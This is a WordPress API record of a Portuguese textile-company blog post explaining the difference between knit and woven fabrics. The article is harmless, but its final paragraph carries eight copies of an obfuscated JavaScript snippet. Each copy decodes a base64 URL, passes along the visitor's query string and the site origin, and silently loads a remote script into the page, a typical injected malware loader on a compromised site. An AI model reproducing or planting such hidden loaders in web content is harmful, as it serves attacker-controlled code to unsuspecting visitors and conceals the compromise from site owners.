{"id":1972,"date":"2024-05-21T09:40:30","date_gmt":"2024-05-21T12:40:30","guid":{"rendered":"https:\/\/www.urbanotextil.com.br\/?p=1972"},"modified":"2024-09-20T20:51:05","modified_gmt":"2024-09-20T23:51:05","slug":"malha-x-tecido-plano-qual-a-diferenca","status":"publish","type":"post","link":"https:\/\/www.urbanotextil.com.br\/en\/malha-x-tecido-plano-qual-a-diferenca\/","title":{"rendered":"Malha x Tecido plano: qual a diferen\u00e7a?"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">Voc\u00ea j\u00e1 se perguntou qual \u00e9 a diferen\u00e7a entre malha e tecido plano?\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Embora ambos sejam usados na fabrica\u00e7\u00e3o dos mais variados tipos de roupas, suas estruturas e caracter\u00edsticas s\u00e3o distintas. Vamos dar uma olhada mais de perto para entender melhor?<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Na constru\u00e7\u00e3o da malha, os fios se entrela\u00e7am em diversas s\u00e9ries de la\u00e7adas. Essa t\u00e9cnica permite que as la\u00e7adas deslizem umas sobre as outras, tanto no sentido da largura quanto no sentido do comprimento. Esse entrela\u00e7amento proporciona \u00e0 malha uma estrutura flex\u00edvel e male\u00e1vel, o que a torna ideal para roupas confort\u00e1veis e que se ajustam ao corpo de forma natural.<\/span><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" width=\"1080\" height=\"1350\" class=\"alignnone size-medium wp-image-1973\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:240\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-1.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-1.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-1-240x300.jpg 240w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-1-10x12.jpg 10w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><\/p>\n<p><span style=\"font-weight: 400;\">Por outro lado, o tecido plano apresenta um entrela\u00e7amento perpendicular da trama e do urdume. Os fios de urdume s\u00e3o alinhados longitudinalmente e firmemente fixados ao tear, conferindo estrutura e comprimento \u00e0s pe\u00e7as planas. Enquanto isso, os fios de trama entrela\u00e7am-se transversalmente aos fios de urdume em um \u00e2ngulo preciso de 90 graus, determinando a largura caracter\u00edstica do tecido plano.<\/span><\/p>\n<p><img decoding=\"async\" width=\"1080\" height=\"1350\" class=\"alignnone size-medium wp-image-1974\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:240\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-2.jpg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-2.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-2-240x300.jpg 240w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/05\/POST-2-10x12.jpg 10w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" \/><\/p>\n<p><span style=\"font-weight: 400;\">Portanto, a principal diferen\u00e7a entre malha e tecido plano reside na forma como os fios s\u00e3o entrela\u00e7ados. Enquanto a malha oferece flexibilidade e maleabilidade, o tecido plano proporciona estrutura e comprimento.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Em suma, tanto a malha quanto o tecido plano t\u00eam suas pr\u00f3prias caracter\u00edsticas e vantagens \u00fanicas. Na Urbano T\u00eaxtil, estamos aqui para ajud\u00e1-lo a encontrar a malha perfeita para as suas necessidades e cria\u00e7\u00f5es.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">N\u00e3o deixe de nos seguir nas redes sociais e acompanhar nosso blog para ficar por dentro das \u00faltimas novidades e tend\u00eancias em malhas!<\/span><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Voc\u00ea j\u00e1 se perguntou qual \u00e9 a diferen\u00e7a entre malha e tecido plano?\u00a0 Embora ambos sejam usados na fabrica\u00e7\u00e3o dos mais variados tipos de roupas, suas estruturas e caracter\u00edsticas s\u00e3o distintas. Vamos dar uma olhada mais de perto para entender melhor? Na constru\u00e7\u00e3o da malha, os fios se entrela\u00e7am em diversas s\u00e9ries de la\u00e7adas. Essa [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1973,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[22],"tags":[],"wt_blog_author":[47],"class_list":["post-1972","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-moda","wt_blog_author-ludimila-martinelli"],"_links":{"self":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1972","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/comments?post=1972"}],"version-history":[{"count":10,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1972\/revisions"}],"predecessor-version":[{"id":2136,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1972\/revisions\/2136"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media\/1973"}],"wp:attachment":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media?parent=1972"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/categories?post=1972"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/tags?post=1972"},{"taxonomy":"wt_blog_author","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/wt_blog_author?post=1972"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}